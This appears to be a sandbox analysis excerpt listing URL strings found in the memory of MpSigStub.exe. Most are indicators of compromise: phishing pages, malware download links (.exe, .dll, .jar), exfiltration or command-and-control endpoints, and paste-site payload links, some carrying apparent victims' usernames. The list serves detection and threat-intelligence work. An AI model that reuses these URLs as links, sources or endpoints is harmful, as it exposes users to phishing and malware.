Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://joro4wixma.azurewebsites.net/wp-admin
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://js-cloud.com/gate.php?token=
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://kamalandcompany.com/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://kennethfantes.com/ve/qas.EXE
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://kenosis.ml/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://koirado.com/vendor/phpunit/phpunit/src/util/php/css/dir/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://laurienmcbride.com/maesrskchibuzor/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/2nuds
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://localmonero.co/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://logins.daum.net/accounts/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://logins.daum.net/accounts/logout.do?url=http%3A%2F%2Fwww.daum.net%2F%3Fnil_profile%3Dlogout
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://mail.daum.net
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://mail.daum.net/login?url=http%3A%2F%2Fmail.daum.net%2F
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.Dc
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://marcostrombetta.com.br/ds/1802.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://massotherapielg.com/css/acrobat/login.micosoftonline.com/index.html
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://maxizoner.com/presentation.dll
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://mazedecrypt.top/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=robertm
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://md.jp-long.online/?e=vpetrillo
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://md.klnmailbox.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://mdhov.ca/storage/mdhov/ca/next.php
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://mdspni.com/realm/send.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://meant.usa.cc/no/sharpoin/sharpoint/share/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://media.discordapp.net/attachments/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://mediadigital.site/class-vc.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://megoseri.com/app.dll%/cvr78f2.tmp.cvr
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://melifotopoulos.gr/components/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://mercados247.com/ds/1602.gif
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://message-read.iosmail-inbox.host/5c36dfff53edaf584b5d9262?qlpq7hq=&amp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://meubackup.terra.com.br/index.php/s/4fwo4jtezhqnzdd/download
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://mhjyutrfgf.gb.net/grte544fc3/?vfegg5355=fvvbveg545
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://minhafinanca.com/wp-admin/css/colors/coffee/reportexcelindeed
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://minisnowhair.com/minisnw2/download2.php?f=htm-2-ads19u09ue11&u=22fc8bcc-db88-4ca7-9654-81ad4
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://miscrsftonline.ml/blessing/policy.php
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://missglamourcosmeticos.com.br/ds/29.gif
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://mjstech1.com/06/lub.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: https://mmjobserver.com/aah/next.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://moegifts.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://mollahossein.ir/cgi_bin/bgxlc3rlckblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://mor32.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://moralsss.com/office/office365/index.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://moranmus.com/adobe-vix/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://mort2021.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://msatechnology.com/admincp/wp-admin/css/colors/ectoplasm/reportexcel.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://mtonlino.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://muropronto.ibsweb.com.br/modules/mod_simplefileuploadv1.3/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://mycrotyx.com/cgi.bin/azure2020/realm/send.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/raw
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://myexternalip.com/rawx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://mylovelybluesky.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://myoffice365-online.com/login/common/login/mridings
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://myscape.in/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://mywebscrap.com/ds/0402.gif
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=a.wirth
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://nizarazu.ru/tyui/?activity=4789652
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: https://notafiscaleletronica-e.com/master/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://office365.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://onestoprnd.com/wp-content/plugins_new/1902/next.php
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://opposedent.com/css/main.css/send.css
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://organigrama.gualda.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://ostoja.tk/browser.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://ourcomm.co.uk/wp-content/plugins/buddyboss-platfo
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office.com/api/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://ov.m4sh-up1x.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://ovjdyp9iz3r.typeform.com/to/kpapmnfe
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://ozmontelectrical.com/drms/fert.html
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://paf.gov-mail.net/13621/1/18844/2/0/0/1390324815/files-b74d99d6/hta
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://panolinuk-my.sharepoint.com/:b:/g/personal/paul_holland_panolin_co_uk/eewdyq0-yzdfhxzreappqk
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/d/n9jsq/0
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/26jiy/0
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://paste.ee/r/cikn9/0
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/E1MURCfS
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/G0jcGs79
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/g10EQ6PS
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/1Tuj3CF7
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: https://pastebinp.com/raw/itDEZ39X
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://paxful.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://pay.2go.com/payment/2-1301222-qoo1mwri7zqbuxa2)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mx
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://pay.yac.mxx:
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://pd.gy-lnoice.online/?e=dskodras
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://peregrineplastics-my.sharepoint.com/:o:/g/personal/bsmith_peregrine_build/erg-sjvfekzmix8xbx
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://petlineir.com/mason/amstream.exe
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://photofinderplus.com/s/?api=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
